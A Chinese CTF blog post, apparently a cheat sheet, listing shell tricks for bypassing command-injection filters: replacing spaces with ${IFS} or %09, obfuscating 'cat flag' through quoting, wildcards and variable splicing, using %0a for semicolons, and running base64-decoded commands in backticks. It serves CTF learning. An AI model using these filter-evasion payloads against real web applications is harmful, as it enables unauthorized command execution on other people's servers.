命令执行绕过

博主： h3110w0r1d
发布时间：2020 年 05 月 01 日
772 次浏览
暂无评论
428字数
分类： CTF

过滤空格

<>
<
${IFS}
$IFS
%09   #Tab

过滤读文件的命令

cat
tac
uniq
c'a't fl'a'g
/???/?at  #相当于cat
t\a\c
a=ag;b=fl;c=t;d=ca;$d$c $b$a

过滤`;`

%0a  (换行符)

正则贪心

a=ag;b=fl;cat $b$a

base64绕过

`echo Y2F0IGluZGV4LnBocA== | base64 -d`
#反引号:将 反引号里的命令执行的结果 作为命令执行

6字符命令执行

最后一道题题目八分析代码获得flag

腾讯犀牛鸟网络安全T-Star高校挑战赛writeup

QUST-SEC战队WRITEUP最后两个SQL注入没有题目一签到操作内容前端过滤 Burp抓包修改即可蚁剑连接...

一道例题

36D杯 WEB_给你shell

题目源代码index.php<?php //It's no need to use scanner...

最后修改：2020 年 07 月 13 日

如果觉得我的文章对你有用，请随意赞赏

发表评论取消回复
本站使用cookie保留您的个人信息以便您下次快速评论，继续评论表示您已同意该条款

评论 *

私密评论

名称 *

🎲

邮箱

地址

粉丝
为什么GitHub的burpsuite的BurpLoaderK...
单
可以查找出字符串strings xxxx.pcap | gre...

命令执行绕过

h3110w0r1d • 2020 年 05 月 01 日

<h3>过滤空格</h3><pre><code class="lang-Bash">&lt;&gt;
&lt;
${IFS}
$IFS
%09   #Tab</code></pre><h3>过滤读文件的命令</h3><pre><code class="lang-Bash">cat
tac
uniq
c&#039;a&#039;t fl&#039;a&#039;g
/???/?at  #相当于cat
t\a\c
a=ag;b=fl;c=t;d=ca;$d$c $b$a</code></pre><h3>过滤<code>;</code></h3><pre><code class="lang-Bash">%0a  (换行符)</code></pre><h3>正则贪心</h3><pre><code class="lang-Bash">a=ag;b=fl;cat $b$a</code></pre><h3>base64绕过</h3><pre><code class="lang-bash">`echo Y2F0IGluZGV4LnBocA== | base64 -d`
#反引号:将 反引号里的命令执行的结果 作为命令执行</code></pre><h3>6字符命令执行</h3><p>最后一道题 题目八 分析代码获得flag<br><div class="preview">
<div class="post-inser post box-shadow-wrap-normal">
<a href="https://h3110w0r1d.com/archives/232/" target="_blank" class="post_inser_a no-external-link no-underline-link">
<div class="inner-image bg" style="background-image: url(https://h3110w0r1d.com/usr/themes/handsome/assets/img/sj/2.jpg);background-size: cover;"></div>

<div class="inner-content" >
<p class="inser-title">腾讯犀牛鸟网络安全T-Star高校挑战赛writeup</p>
<div class="inster-summary text-muted">
QUST-SEC战队WRITEUP最后两个SQL注入没有题目一 签到操作内容前端过滤 Burp抓包修改即可蚁剑连接...
</div>
</div>
</a>

</div>

</div></p><p>一道例题<br><div class="preview">
<div class="post-inser post box-shadow-wrap-normal">
<a href="https://h3110w0r1d.com/archives/210/" target="_blank" class="post_inser_a no-external-link no-underline-link">
<div class="inner-image bg" style="background-image: url(https://h3110w0r1d.com/usr/themes/handsome/assets/img/sj/2.jpg);background-size: cover;"></div>

<div class="inner-content" >
<p class="inser-title">36D杯 WEB_给你shell</p>
<div class="inster-summary text-muted">
题目源代码index.php&lt;?php
//It&#039;s no need to use scanner...
</div>
</div>
</a>

</div>

</div></p>

命令执行绕过

过滤空格

过滤读文件的命令

过滤`;`

正则贪心

base64绕过

6字符命令执行

发表评论取消回复
本站使用cookie保留您的个人信息以便您下次快速评论，继续评论表示您已同意该条款

Python3 修复PNG图片的宽高 CRC爆破

CTF MISC杂项总结

2020新春战疫 MISC 套娃 WriteUp

攻防世界 jpg RCTF-2015

攻防世界 stage1

攻防世界 benefit

解决浏览器自动填充后input背景变为黄色

攻防世界 Training-Stegano-1

WPF Popup 模糊

攻防世界 jpg RCTF-2015

命令执行绕过

过滤空格

过滤读文件的命令

过滤;

正则贪心

base64绕过

6字符命令执行

发表评论 取消回复 本站使用cookie保留您的个人信息以便您下次快速评论，继续评论表示您已同意该条款

命令执行绕过

过滤`;`

发表评论取消回复
本站使用cookie保留您的个人信息以便您下次快速评论，继续评论表示您已同意该条款